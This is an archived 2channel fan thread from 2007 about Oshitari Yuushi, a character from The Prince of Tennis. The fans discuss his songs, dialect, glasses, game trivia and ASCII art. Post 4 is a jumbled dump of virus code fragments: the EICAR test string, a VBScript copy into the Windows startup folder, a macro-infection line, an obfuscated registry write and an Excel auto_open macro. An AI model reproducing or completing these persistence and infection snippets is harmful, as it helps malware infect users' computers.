2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【テニプリ】忍足侑士を推したり有したりするスレ2【氷帝】

1 :名無しかわいいよ名無し:2007/10/26(金) 07:53:47 ID:IPmhd0iq
関西弁で伊達メガネで足フェチで医者の息子でサゴシキズシが好きで
氷帝の天才でラブロマンス映画をこよなく愛する忍足侑士のスレです

前スレ
【テニプリ】忍足侑士を推したり有したりするスレ【氷帝】
http://anime2.2ch.net/test/read.cgi/cchara/1164377052/

2 :名無しかわいいよ名無し:2007/10/26(金) 15:54:49 ID:B/Jv0RpA
1乙!

3 :名無しかわいいよ名無し:2007/10/26(金) 16:04:01 ID:CY9W9PxU
>>1
前スレより久米田作品における忍足登場情報のまとめ


873 名無しかわいいよ名無し sage 2007/10/09(火) 22:59:52 ID:011nUwSk
ところで忍足が出てくる絶望先生の巻教えてくれまいか

874 名無しかわいいよ名無し 2007/10/09(火) 23:12:06 ID:fBfzdeFL
3刊の第29話ですぜ。

875 名無しかわいいよ名無し sage 2007/10/09(火) 23:52:27 ID:pRvnxbAa
9巻86話と改蔵24巻3話にもいますぜ

942 名無しかわいいよ名無し sage 2007/10/17(水) 01:07:49 ID:hy/8AdOn
今更だけど一応うろ覚えながらもまとめてみました
絶望・改蔵の忍足(であろうと思われる)ネタ
スレチだと思ったらスルーしてね

・(原作だと)クールで意地悪な天才が(アニメだと)ただのムッツリスケベに(おそらく忍足)
・原作であんなにかっこよかった台詞もあの声優に言われると…(セリフ・画付、多分忍足)
・二次元の男の子しか好きになれない女の子の部屋の壁にあるポスターの絵が明らかに忍足
・「色眼鏡は眼鏡をかけた男子が色目を使うことだと思ってしまっていた」背景の画が確実に忍足

まだあると思うけど思い出せない
結構ネタにされてるなぁ

4 :名無しかわいいよ名無し:2007/10/26(金) 17:48:59 ID:CQy5x60Q
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :名無しかわいいよ名無し:2007/10/26(金) 22:12:10 ID:MwlhasFj
>>1
乙!

好きな歌は「A気持ち」かな。

6 :名無しかわいいよ名無し:2007/10/26(金) 23:13:34 ID:dFITwk8b
>>1乙!

自分は「MEBACHIKO」が好きだな
この歌のお陰で、ずっと謎だっためばちこの意味が分かったwww

7 :名無しかわいいよ名無し:2007/10/27(土) 03:31:56 ID:FqUVIj50
「銀の剣」は名曲

8 :名無しかわいいよ名無し:2007/10/27(土) 13:27:29 ID:GMkTovU7
craftyが好き

9 :名無しかわいいよ名無し:2007/10/27(土) 14:50:07 ID:Mvi+eJth
バレキスは宍戸さん長太郎との絡みが萌えた

10 :名無しかわいいよ名無し:2007/10/28(日) 02:02:16 ID:487TCJV3
このままの流れでいくと忍足の曲がコーラス参加系も含めて全曲出てきそうだw

11 :名無しかわいいよ名無し:2007/10/28(日) 04:39:24 ID:2djNRd+B
流れぶった切りスマソ

ジャンプの「P2」って漫画に出てくる遊部遊(あそべゆう)ってキャラが忍足に見えて仕方無いんだが…
ガイシュツ?気のせい?
関西弁だし髪長めだしダテメガネーゼっぽいし…
なんか明るい忍足みたいで嬉しくなっちゃったよw

そんな私は虹の正体が好きです(・∀・)

12 :名無しかわいいよ名無し:2007/10/28(日) 09:59:35 ID:yYQQFMnV
なんか
  関西弁=忍足
 伊達眼鏡=忍足
   変態=忍足
  髪長め=忍足
エロボイス=忍足

みたいな気がしてきた・・・。

13 :名無しかわいいよ名無し:2007/10/28(日) 13:47:33 ID:1/Fr88Lh
少年進化論っていう漫画にも
忍足そっくりな関西弁長髪眼鏡出てくる

14 :名無しかわいいよ名無し:2007/10/28(日) 19:29:26 ID:WC+Sy5Ez
でもやっぱりテニスの忍足が好き

15 :名無しかわいいよ名無し:2007/10/28(日) 21:48:20 ID:uDDtx4V7
そりゃ本家の忍足が一番格好良いに決まってるだろ

16 :名無しかわいいよ名無し:2007/10/29(月) 00:01:43 ID:487TCJV3
手塚スレ見たら眼鏡'S復活の噂が…!
ジャンプを全力でチェックするぞ!!

17 :名無しかわいいよ名無し:2007/10/29(月) 01:03:57 ID:r0HLI7gk
マジかーーー

噂が本当なら凄い嬉しい
眼鏡'S人気だしまだまだ終わらんよね

18 :名無しかわいいよ名無し:2007/10/29(月) 03:33:27 ID:CkNTuaZl
3人の人気はもちろん、中の人の作る歌がいいのが大きいよね。
眼鏡'Sの曲全部好きだw

しかも毎回眼鏡トーク面白いしw

19 :名無しかわいいよ名無し:2007/10/29(月) 11:57:11 ID:0gfJmIgp
5部作まで構想してて、5部で解散って考えてたって木内さんが言ってたもんね!

ホントに眼鏡's復活とかだったらたまらんなww

20 :名無しかわいいよ名無し:2007/10/29(月) 19:05:21 ID:k3mCzh3O
声優総合かキャラソンスレでも見かけたな<眼鏡's新曲情報

せっかく喜ばしい情報が入ったんだし保守させて貰う
圧縮に引っかかって忍足スレ落ちられてたまるか


21 :名無しかわいいよ名無し:2007/10/29(月) 19:25:24 ID:Bls/tKJV
そろそろ圧縮来そうだからこまめに監視します><

そして眼鏡'S新曲発売決定おめ

22 :名無しかわいいよ名無し:2007/10/29(月) 21:38:43 ID:nb/X1c18
今ジャンで確認<12/22(土)眼鏡’s 4thシングルリリース決定

23 :名無しかわいいよ名無し:2007/10/29(月) 23:01:57 ID:QIdHjrHw
そうすると12月22日は眼鏡記念日だな

24 :名無しかわいいよ名無し:2007/10/29(月) 23:38:34 ID:r0HLI7gk
水曜発売じゃないのか
なんか意味あるのかな

25 :名無しかわいいよ名無し:2007/10/30(火) 08:02:00 ID:USviXGXc
眼鏡CDタイトル気になるなwww
次は何眼鏡'Sかwww

26 :名無しかわいいよ名無し:2007/10/30(火) 08:56:23 ID:FAwIbgIV
>>25
発売日的に「聖夜の眼鏡’s」で来ないかな

27 :名無しかわいいよ名無し:2007/10/30(火) 21:28:13 ID:GJEXQf4f
ならジャケットは眼鏡'Sのサンタ姿で決まりだな!

28 :名無しかわいいよ名無し:2007/10/31(水) 01:23:39 ID:sfj5OB39
メリクリ眼鏡'S
とか
赤服眼鏡'S
でないことを祈るw

29 :名無しかわいいよ名無し:2007/10/31(水) 06:21:14 ID:RuFi2FVr
赤紙眼鏡's

30 :名無しかわいいよ名無し:2007/10/31(水) 11:58:06 ID:vR729JQA
>>29
徴兵www

31 :名無しかわいいよ名無し:2007/10/31(水) 13:39:11 ID:+Xavlq62
謙也と自慢大会したり、激ダサやとか言っちゃう忍足が好き

32 :名無しかわいいよ名無し:2007/10/31(水) 18:25:58 ID:0xKC5HXv
忍足に標準語は似合わないね

33 :名無しかわいいよ名無し:2007/11/01(木) 01:06:11 ID:Ak9Z65Qz
忍足の喋りかたツボすぎる

34 :名無しかわいいよ名無し:2007/11/01(木) 01:46:46 ID:AizP/G1d
そういや従兄弟と直接話してるシーンってまだ無いんだね
電話とか言伝(ユーシが言うとったわ〜みたいなん)とかならあるけどさ
焼肉の時も一応同じ場所にいたのに、お前らそんなに顔合わせたくないのかとw

35 :名無しかわいいよ名無し:2007/11/01(木) 08:44:36 ID:BYK1/zV/
>>34
たしけがよく考えてなかったに一票

36 :名無しかわいいよ名無し:2007/11/01(木) 14:57:34 ID:Y5GAngJB
>>34
さらに従兄弟設定忘れているに一票

37 :名無しかわいいよ名無し:2007/11/01(木) 22:43:56 ID:DA6esDlF
おいw
痴呆老人かたしけは

38 :名無しかわいいよ名無し:2007/11/02(金) 01:20:27 ID:CfT8ZRPj
たしけはドジッ子?

39 :名無しかわいいよ名無し:2007/11/02(金) 04:09:18 ID:DWjOHcwq
天然だよ

40 :名無しかわいいよ名無し:2007/11/02(金) 23:15:02 ID:Da+rpmZl
ちょwwwおまいらの所為でたしけに萌えちまったじゃねーかwwww

41 :名無しかわいいよ名無し:2007/11/03(土) 00:49:37 ID:mgzGTb3m
萌えたら負けかな、って思ってる

42 :名無しかわいいよ名無し:2007/11/03(土) 17:10:47 ID:BY8P0RWC
じゃあ自分はもう負け

43 :名無しかわいいよ名無し:2007/11/03(土) 17:34:51 ID:HwTVrA6c
自分もオワタ\(^O^)/

44 :名無しかわいいよ名無し:2007/11/03(土) 19:37:55 ID:qVirNAtX
なにこの流れw


アニメやゲームも良いけどやっぱ原作の忍足が一番かっこいい

ってさっき氷帝狂詩曲読みながら思ってた
少しでも良いから大会その後の忍足も描いてほしいよ、たしけセンセ

45 :名無しかわいいよ名無し:2007/11/03(土) 20:22:50 ID:2JnJ/uhP
>>41
逆だよ。萌えたら勝ち組だと思う。

忍足って京都出身なのか?大阪なのか?


46 :名無しかわいいよ名無し:2007/11/03(土) 21:25:46 ID:lxvktJgm
アナザーストーリーとして氷帝メインの書き下ろしキボン
いくらでも出すよ

47 :名無しかわいいよ名無し:2007/11/04(日) 00:22:19 ID:Ql4pQWt+
確かにそれは見てみたい
漫画でもDVDでも良いから出してくれないかな

48 :名無しかわいいよ名無し:2007/11/04(日) 00:47:59 ID:K+JtvR5I
>>45
大阪じゃない?
味覚とか言葉遣いとか。(exオカン、冷コー)

49 :名無しかわいいよ名無し:2007/11/04(日) 03:53:10 ID:0wAXlzTV
御座候発言では兵庫の可能性も・・・
ってそれは中の人が神戸出身だからかw

たしけの設定では普通に大阪だったんだろうけど、
声優さんのおかげ(せい?)で出身地があやふやになったって感じだなwww

50 :名無しかわいいよ名無し:2007/11/04(日) 14:53:30 ID:TeM/S1UN
そのへん謎なのも忍足の魅力

51 :名無しかわいいよ名無し:2007/11/04(日) 15:10:36 ID:wj4altEm
もう何もかも魅力なのかww

52 :名無しかわいいよ名無し:2007/11/04(日) 15:25:36 ID:YlmyXssC
(*○∀○) 〈ageとくでー

53 :名無しかわいいよ名無し:2007/11/04(日) 17:17:43 ID:KQxFd2JK
ちんこ大きい

54 :名無しかわいいよ名無し:2007/11/04(日) 18:30:03 ID:i4CQvGqy
アニメの忍足肌の色が・・・
長時間見るのは堪えられないぜ

55 :名無しかわいいよ名無し:2007/11/05(月) 01:09:04 ID:jPkPXDSd
( 〇д〇)気にしたらあかんぜ














(〇д〇)

56 :名無しかわいいよ名無し:2007/11/05(月) 04:55:47 ID:foQ4Kkc/
>>55
こっち見んなw

肌の色といえば真夏の眼鏡'sの時、色白2人に挟まれたせいで際立ってたの思い出してワロタw
おったりが色白設定じゃない事にあらためて萌えちまったよ

57 :名無しかわいいよ名無し:2007/11/05(月) 12:32:59 ID:hf9Ofzrv
色白の岳人と一緒にいる事も多いから際立つなw


58 :名無しかわいいよ名無し:2007/11/05(月) 21:37:11 ID:kEIeRnEu
でも忍足は色白のが自分的には萌える

59 :名無しかわいいよ名無し:2007/11/05(月) 22:14:39 ID:VpW/SjGI
自分も

肌がすべすべしてそうでw

60 :名無しかわいいよ名無し:2007/11/05(月) 23:53:29 ID:CnRedYM9
氷帝で色白設定なのって跡部と岳人か
色黒忍足もう慣れたけどね

あとDSのside kingのジャケに忍足が居て嬉しかった

61 :名無しかわいいよ名無し:2007/11/06(火) 00:51:03 ID:XaxiuOzG
アニメの忍足が色黒いのは睡眠不足だからに違いない
一度ラブロマンス見たら感動して眠れないと

62 :名無しかわいいよ名無し:2007/11/06(火) 07:09:05 ID:U6lLTU4C
>>61
ちょw寝不足と肌の色って関係あるの?

63 :名無しかわいいよ名無し:2007/11/06(火) 13:46:33 ID:L28BUnNh
血行が悪くなっちゃうのかw

64 :名無しかわいいよ名無し:2007/11/06(火) 22:05:20 ID:2SEEmeIX
そうなのか?!初めて知った・・・

65 :名無しかわいいよ名無し:2007/11/06(火) 22:16:50 ID:ZThaPyzF
色白だったら眼鏡の日焼けのあとつきそうだしなw

66 :名無しかわいいよ名無し:2007/11/06(火) 22:19:40 ID:ZThaPyzF
海外留学中に何かあったと予想
それこそリアルにローマの休日みたいなことやってそうだw

67 :名無しかわいいよ名無し:2007/11/06(火) 22:24:09 ID:iB45S6nb
ジェラート食べてうっとりする忍足

68 :名無しかわいいよ名無し:2007/11/06(火) 22:38:25 ID:uj9DZPdo
というか>>66は監督スレへ行くはずだった誤爆な気がしてならない
違ったらエスパーごめん

69 :名無しかわいいよ名無し:2007/11/06(火) 23:27:39 ID:ZThaPyzF
>>68
ご名答orz
よりによってここと43スレ
回線切って逝ってくる

70 :名無しかわいいよ名無し:2007/11/07(水) 00:01:19 ID:rj0L3Ko3
逝かんでいいw
忍足は審判の口に手つっこんで「抜けないー」を
絶対にやると思う


71 :名無しかわいいよ名無し:2007/11/07(水) 00:45:10 ID:XrKMGVSt
そこできちんとツッコミを入れたら喜びそうだなwww


72 :名無しかわいいよ名無し:2007/11/07(水) 07:17:18 ID:2HAeMZNd
>>70
ぼーっと読んでたらテニスの審判の口かと思ってギョっとしたw
ラブロマンス好きなのは母か姉の影響なのか元々好きなのか気になる

73 :名無しかわいいよ名無し:2007/11/07(水) 08:02:53 ID:HQqzEn26
テニスの審判の口に手突っ込んで「抜けないー!」をやってコートから追い出される忍足wwwww

74 :名無しかわいいよ名無し:2007/11/07(水) 10:31:57 ID:Rf4R4/KV
>>73
ちょwwしかし…

うむ、たまらん忍足だな

75 :名無しかわいいよ名無し:2007/11/07(水) 13:25:54 ID:r57PbJws
>>74
真田w

思ったんだが忍足ってユニットの時声目立つな
大勢で歌ってても忍足の声は必ず分かるw

76 :名無しかわいいよ名無し:2007/11/07(水) 17:48:59 ID:n3I1e9Co
それは愛のせいだwと言おうとしたけど
声の出し方からして特殊?だし
意識してなくても分かっちゃうよな

77 :名無しかわいいよ名無し:2007/11/07(水) 21:09:01 ID:Bn3CbWiA
青と瓶と缶とか特に目立つような気がする
眼鏡'Sはみんな声低いしプルタブはソロパートないし

そういや真田もユニットだと声目立つよね

78 :名無しかわいいよ名無し:2007/11/07(水) 21:31:20 ID:n3I1e9Co
暑苦しいから分かりやすいよねw>真田

79 :名無しかわいいよ名無し:2007/11/07(水) 21:33:20 ID:L5CRysL6
>>78
暑苦しいってw真田はきっと影で泣いてるよw
立海で皆から虐められてそうだ。単純に。

忍足も皆から軽くそんなんだと良いなと思う。

80 :名無しかわいいよ名無し:2007/11/07(水) 21:40:02 ID:nZVEz8Rr
そーゆーのはよそでやってくれー

81 :名無しかわいいよ名無し:2007/11/07(水) 21:59:59 ID:H+EOZFLu
>>80
これやめさせようとすると腐女子が文句言い出して荒れるから自分で話題出して流れ変えた方がいいよ

82 :名無しかわいいよ名無し:2007/11/07(水) 22:05:54 ID:njoNkBnZ
( 〇д〇)難儀やなあ













(〇д〇)

83 :名無しかわいいよ名無し:2007/11/07(水) 22:17:04 ID:XrKMGVSt
こっち見んなやwww


84 :名無しかわいいよ名無し:2007/11/08(木) 00:08:56 ID:GTFGerKn
忍足のまん丸眼鏡は漫画だからアリな一品だと思っていた時期が、私にもありました。

うちの教授がナチュラルにかけていたことに気づかなかった私は忍足ファン失格でしょうかorz
普通に使えるんだね!!今までちょっと(伊達はいいとして何故まん丸…)とか馬鹿にしててごめんよ忍足!!

チラ裏だけどこの思いを吐き出す場所が他に無かったスマソ

85 :名無しかわいいよ名無し:2007/11/08(木) 00:33:32 ID:XDTk1vH1
忍足は真ん丸眼鏡だけじゃなくて、手塚みたいな楕円の眼鏡や、乾みたいな四角い眼鏡も似合いそうだな

86 :名無しかわいいよ名無し:2007/11/08(木) 00:38:44 ID:ZD14GdkL
サングラスはどうよ

87 :名無しかわいいよ名無し:2007/11/08(木) 00:57:51 ID:dT5JYzTY
かけれるモンなら何でも似合うでぇ(●д●)

88 :名無しかわいいよ名無し:2007/11/08(木) 01:02:21 ID:kHMb/W3C
マスクはどうよ

89 :名無しかわいいよ名無し:2007/11/08(木) 02:47:56 ID:sJ7zyd8e
ほら似合うやろ?(〇□〇)






あかんわ‥マスクから息もれて眼鏡がくもるわ〜(◎□◎;)

90 :名無しかわいいよ名無し:2007/11/08(木) 11:22:19 ID:GTFGerKn
忍足なにやってんだ忍足w
マスク無くても、寒くなってきたから急に暖かいところに行くと眼鏡曇っちゃうね

91 :名無しかわいいよ名無し:2007/11/08(木) 11:34:42 ID:5q80jvhA
ラーメン食べたりしても曇るね

92 :名無しかわいいよ名無し:2007/11/08(木) 12:20:59 ID:XDTk1vH1
熱いコーヒーを飲む時も曇るな

93 :名無しかわいいよ名無し:2007/11/08(木) 13:18:07 ID:dT5JYzTY
そんなリスクを背負ってでも伊達丸眼鏡にこだわる忍足

一体何が彼をつき動かすのだ・・・

94 :名無しかわいいよ名無し:2007/11/08(木) 13:25:49 ID:GTFGerKn
格好つけたいだけなんじゃないかby乾

眼鏡をはずす夜より

95 :名無しかわいいよ名無し:2007/11/08(木) 19:10:45 ID:ICS+uqZZ
でも眼鏡がない忍足は忍足じゃない気がする。
素で格好良いのに更になりたいか

96 :名無しかわいいよ名無し:2007/11/09(金) 03:46:05 ID:BDFbI6BY
しかしヤツは髪型もいいな
長さといいモッサリさといいw

朝シャンして髪型決めて、
家を出るギリギリまで眼鏡をかけてない忍足を想像して一人和んだ(´・ω・)

97 :名無しかわいいよ名無し:2007/11/09(金) 12:05:40 ID:5EcXO3Ci
あの髪のもっさり具合からすると天然パーマ気味なのかもな
きちんとセットしないとすごい事になりそうだwww

98 :名無しかわいいよ名無し:2007/11/09(金) 19:04:31 ID:3/CsodWI
意味も無くドコモの眼鏡の絵文字を使ってしまう今日この頃

99 :名無しかわいいよ名無し:2007/11/09(金) 20:52:00 ID:SDPuhSSM
忍足の絵文字とかあったらいいな。

100 :名無しかわいいよ名無し:2007/11/10(土) 12:49:26 ID:NecIFAhm
忍足の絵文字www

101 :名無しかわいいよ名無し:2007/11/10(土) 17:29:00 ID:HVePnzg6
そんな絵文字あったら毎日意味も無く使うわw

ところでおまいらは忍足が11歳からテニス始めたって知ってましたか?
自分は知りませんでしたww

102 :名無しかわいいよ名無し:2007/11/10(土) 18:32:32 ID:ICWevv3C
ゲームの設定って公式なの?

103 :名無しかわいいよ名無し:2007/11/10(土) 18:56:26 ID:1DBs1Uqb
>>101
マジで? 知らなかった、何情報?
原作以外はあんまり詳しく見てないからなー

104 :名無しかわいいよ名無し:2007/11/10(土) 19:18:58 ID:51qGG2OZ
>>101
kwsk

ゲームの設定は一応公式なんじゃないか?


105 :101:2007/11/10(土) 20:58:26 ID:HVePnzg6
>>102が言うとおりゲーム「RUSH&DREAM」での情報。
練習試合で忍足&岳人ペアと戦う場面があるんだけど、
その時ペアに観月を選んでデータを聞いた。
そしたら身長、体重などのプロフィールに加えて2人のキャリアを教えてくれたw
ちなみに岳人は12歳かららしい。

なんか意外な形で知れて嬉しかったなぁ(`・ω・´)

106 :名無しかわいいよ名無し:2007/11/10(土) 22:39:20 ID:n8Ah8i1+
>>99-101を読んで暇だったんで作ってみた
ttp://s.pic.to/jwc01
デコメ・デコメ絵文字として使える・・・はず
一応自分の携帯で試してみたんだが他の携帯は分からん

107 :名無しかわいいよ名無し:2007/11/10(土) 23:01:37 ID:vt26H2Nm
>>105
意外な形で知らなかった情報を知ることができて嬉しいのと、
そういうキャラの設定は原作できちっと出してほしかったのと、
極端な気持ちがあるな自分は。

ファン全員が全員ゲームやるとも限らないんだし。
ま、そういう隠しネタみたいなのも、購買層を増やす手段と言えば身もふたもないけど。

108 :名無しかわいいよ名無し:2007/11/10(土) 23:19:10 ID:V+kPKWRk
>>106
うまい!忍足だw

109 :名無しかわいいよ名無し:2007/11/10(土) 23:54:08 ID:51qGG2OZ
>>106
GJ!!
有り難く使わせてもらうよ

110 :名無しかわいいよ名無し:2007/11/11(日) 04:36:04 ID:d5OkCg/j
>>106
GJwww忍足きめえwww

111 :名無しかわいいよ名無し:2007/11/11(日) 07:09:01 ID:H7CJQLZV
>>106
ありがとう!
夢が叶ったのでこれから毎日意味もなく使わせていただきますw

112 :名無しかわいいよ名無し:2007/11/11(日) 13:39:27 ID:fkV+curM
忍足とMajorに出ている宮崎ってギザ似ッす!!


113 :名無しかわいいよ名無し:2007/11/11(日) 14:17:54 ID:yBaG+gYj
http://up2.viploader.net/pic/src/viploader512828.jpg
http://upload2.dyndns.org/up/4/_/jump/1194600808.zip/attatch

114 :名無しかわいいよ名無し:2007/11/11(日) 17:36:48 ID:pbbE4Vp9
>>112
自分もかなり思うけど何か違うwww


115 :名無しかわいいよ名無し:2007/11/11(日) 21:48:17 ID:dYeD7yo3
>>112
今まで思わんかったのに
もうそうとしか思えなくなったwww

116 :名無しかわいいよ名無し:2007/11/12(月) 01:41:55 ID:lSo25eR6
忍足似のキャラって何故か多い

117 :名無しかわいいよ名無し:2007/11/12(月) 10:36:37 ID:y+IO1Oep
今週のゲーム記事忍足


           カナワンナァ…イジリスギヤ
   ヽ(○ω○)ノ ズコー
  \( \ノ
、从ハ   ̄
 ̄ ̄

118 :名無しかわいいよ名無し:2007/11/12(月) 14:56:35 ID:4PDtUyL3
>>117
ちょww
テレポートダッシュでジャンプ買ってくる

119 :名無しかわいいよ名無し:2007/11/12(月) 17:55:02 ID:jOoo01tm
>>117
ワロスwwww
それって今度出るゲームのやつだよなwww


120 :名無しかわいいよ名無し:2007/11/12(月) 23:22:34 ID:I+iKfJkM
ジャンプ見た

忍足かわいすぎwwwwww

121 :名無しかわいいよ名無し:2007/11/13(火) 00:35:16 ID:xn+SpIwV
ゲーム記事どこかわからない

122 :名無しかわいいよ名無し:2007/11/13(火) 20:15:00 ID:W1zulA8S
目次見ろよリボーンの後

123 :名無しかわいいよ名無し:2007/11/13(火) 20:18:50 ID:3yDbP4u2
忍足サマが一番しゅきだ!!(’A’)

124 :名無しかわいいよ名無し:2007/11/13(火) 22:35:17 ID:pzRDiSXk
忍足ヘアは、ナチュラルくせ毛ってドキサバでいってましたよ。

125 :名無しかわいいよ名無し:2007/11/14(水) 16:17:11 ID:vlgEoUEy
あぁたしかにそんな感じ〜〜

126 :名無しかわいいよ名無し:2007/11/14(水) 16:34:08 ID:qBF3tcPk
「俺や手塚みたいなナチュラルクセ毛系」
だっけ?


127 :名無しかわいいよ名無し:2007/11/14(水) 16:36:20 ID:vlgEoUEy
ナチュラル・・・・

128 :名無しかわいいよ名無し:2007/11/14(水) 17:53:37 ID:qDByN45I
ゲームやらんから情報ありがたいな

>>123 >>125 >>127
メール欄に半角でsageと記入して下さい

129 :名無しかわいいよ名無し:2007/11/14(水) 18:15:13 ID:vlgEoUEy
手塚もナチュラル??

130 :名無しかわいいよ名無し:2007/11/14(水) 19:53:22 ID:oaRI/7TH
>>129
うん。手塚もナチュラルだからメール欄にsageを入れて書き込んでね。
そうしないとスレが上がっちゃうんだ(´・ω・`)

今さらながら>>117のAAの完成度が素晴らしすぐるw

131 :117:2007/11/14(水) 20:26:18 ID:ue8Zxwmt
>>130
既存のこの子に眼鏡付けて耳消しただけなんだがなwww
AAスレで拾った子が役にたってくれた

    ∧∧
   ヽ(・ω・)ノ ズコー
  \( \ノ
、从ハ   ̄
 ̄ ̄

132 :名無しかわいいよ名無し:2007/11/15(木) 10:32:50 ID:/iLyiiR+
age

133 :名無しかわいいよ名無し:2007/11/15(木) 16:33:17 ID:XEPA++sA
原作の忍足って笑ってるシーン全然ないね
アニメのグッズとかだと笑顔のことが多いから意外

134 :名無しかわいいよ名無し:2007/11/15(木) 17:47:36 ID:hOhem86a
ゲームの攻略本人物紹介で「人当たりがよさそうに見える」
ってあって意外だった記憶はある





135 :名無しかわいいよ名無し:2007/11/15(木) 18:28:09 ID:kop9UPKo
(〇∀〇)原作とアニメで何かキャラがちゃうのも俺の魅力の一つやで

(´〇д〇)んあぁ寒なってったなぁ〜
みんな風邪ひいてへんか?

( 〇д〇)こんな日は粕汁飲みたいわ〜粕汁…



(〇д〇)

136 :名無しかわいいよ名無し:2007/11/15(木) 19:41:56 ID:eR9T1ahn
ちんこ大きい

137 :名無しかわいいよ名無し:2007/11/15(木) 21:16:13 ID:MrHVd/Vx
>>135
ちょwこっちみんなw
最後は何だよwww

138 :名無しかわいいよ名無し:2007/11/15(木) 21:26:17 ID:1gxDaYgS
そういや忍足の眼鏡には仕掛けがあるのかないのか。
キャラソンでは「仕掛けはないよ〜」とか言ってたけど、ゲームで、
「この眼鏡を外すと大変なことが起こるんや……」とか言ってたから、本当にあの眼鏡の秘密が気になるwww

139 :名無しかわいいよ名無し:2007/11/15(木) 21:30:18 ID:ViQylFha
レンズには何も仕掛けはないよ
+眼鏡を外すと大変なことに
→鼻あてや弦の部分に何かがあるに違いない

140 :名無しかわいいよ名無し:2007/11/15(木) 22:29:43 ID:kop9UPKo
>>137
( 〇д〇)誰かに粕汁作って欲しかったんや…

>>138
>>139
眼鏡が入れ替わっただけで口癖も変わるみたいだからねw
忍足含め本当みんな不思議な眼鏡かけてるなw

141 :名無しかわいいよ名無し:2007/11/16(金) 00:45:46 ID:zXF4Uppo
危険な眼鏡や…

142 :名無しかわいいよ名無し:2007/11/16(金) 13:27:53 ID:QNHb8/oW
ゲームで「眼鏡はキスする時だけ外す」とか言ってたよね
聞いた時は固まってしまったw

143 :名無しかわいいよ名無し:2007/11/16(金) 19:52:48 ID:SatndreO
ゲームの忍足は正直キツい時があるなww
学プリで映画館でガン見されてた時はガクブルした

144 :名無しかわいいよ名無し:2007/11/16(金) 21:06:46 ID:3M42Lm5L
>>142
あれは叫んだ。
中学生がそんな事を言って良いのか

145 :名無しかわいいよ名無し:2007/11/16(金) 21:23:25 ID:6N5+aHRs
そんなのありましたか???!!!!どうやって見るんすか???!!!

146 :名無しかわいいよ名無し:2007/11/16(金) 21:30:25 ID:OeBpQsIT
>>145
またお前か
いいからメール欄に半角小文字でsageと入れろ

147 :名無しかわいいよ名無し:2007/11/16(金) 21:31:13 ID:1DQAWGcv
>>145
sage覚えるまでロムれよ…

148 :名無しかわいいよ名無し:2007/11/17(土) 00:43:21 ID:Q6ysy2qb
( 〇д〇)はよ席つきや、今からスルー検定始めんで

149 :名無しかわいいよ名無し:2007/11/17(土) 13:48:13 ID:K2D9X0f4
(゚д゚)ノ先生!ジローくんが寝てます!

150 :名無しかわいいよ名無し:2007/11/17(土) 14:55:18 ID:XBeSjLNN
>>148
忍足先生いいなwww

151 :名無しかわいいよ名無し:2007/11/17(土) 15:55:23 ID:zjIZShI+
ジローは起きてるほうが驚くだろww

152 :名無しかわいいよ名無し:2007/11/17(土) 17:04:37 ID:+y3ucCv6
パッチリ(*゚∀゚)

川б∀б;川ノ 忍足先生!ジローが起きてます!!!

153 :名無しかわいいよ名無し:2007/11/17(土) 17:52:31 ID:/Gq+qIqd
ごめんメール欄ってどこ??!!

154 :名無しかわいいよ名無し:2007/11/17(土) 17:55:33 ID:/Gq+qIqd
ごめんメール欄ってどこ??!!

155 :名無しかわいいよ名無し:2007/11/17(土) 17:59:38 ID:Dk1swLir
>>154
それでOK

156 :名無しかわいいよ名無し:2007/11/17(土) 18:02:41 ID:Dk1swLir
ん?何か違う…aとeが全角になってないか?

157 :名無しかわいいよ名無し:2007/11/17(土) 18:03:11 ID:/Gq+qIqd
これでいいんっすか??すいません
あんまり分かってなくて((汗

158 :名無しかわいいよ名無し:2007/11/17(土) 18:47:06 ID:+y3ucCv6
>>157
( 〇д〇) 直っとらんよ
( 〇д〇) sageは全部半角にせなあかん

159 :名無しかわいいよ名無し:2007/11/17(土) 19:50:58 ID:sH+yjRLB
sage入れてたのになぁ・・・。

160 :名無しかわいいよ名無し:2007/11/17(土) 19:52:22 ID:sH+yjRLB
忍足先生ー。
スルー検定より忍足検定してください

161 :名無しかわいいよ名無し:2007/11/17(土) 20:26:36 ID:+y3ucCv6
忍足をさがせ!


忍促忍捉忍促忍促忍促忍促忍忍促忍捉認足忍促忍促忍促忍促
忍促忍促忍促忍捉忍促忍促忍促忍促忍忍促忍捉認足忍促忍促
忍促忍認促促忍促忍促忍促忍足忍促認忍促忍促忍促忍忍促足
忍捉認足忍促忍促忍促忍促忍促忍促忍捉忍捉認促忍捉認足忍
促忍促忍促忍促忍忍促忍捉認足忍促忍促忍促忍認促促忍促忍
促忍促忍捉忍促認忍促認足忍促忍促忍捉忍忍捉忍捉忍捉忍促


勢いでやった
少し公開している

162 :161:2007/11/17(土) 20:30:01 ID:+y3ucCv6
×公開
○後悔

163 :名無しかわいいよ名無し:2007/11/17(土) 20:44:39 ID:JDicq2/s
忍足見つけた!目が痛いw

164 :名無しかわいいよ名無し:2007/11/17(土) 21:35:45 ID:o/G/dI17
ゲシュタルト崩壊ww

165 :名無しかわいいよ名無し:2007/11/17(土) 22:08:21 ID:Ze7EDlx9
>>161
お、あったあった
目がちかちかするwww

166 :名無しかわいいよ名無し:2007/11/18(日) 03:11:59 ID:z15We4O+
まんまとゲシュタルト崩壊の餌食にwww

167 :名無しかわいいよ名無し:2007/11/19(月) 07:31:06 ID:ZZzDEY3C
今更ながらアルバム買いました

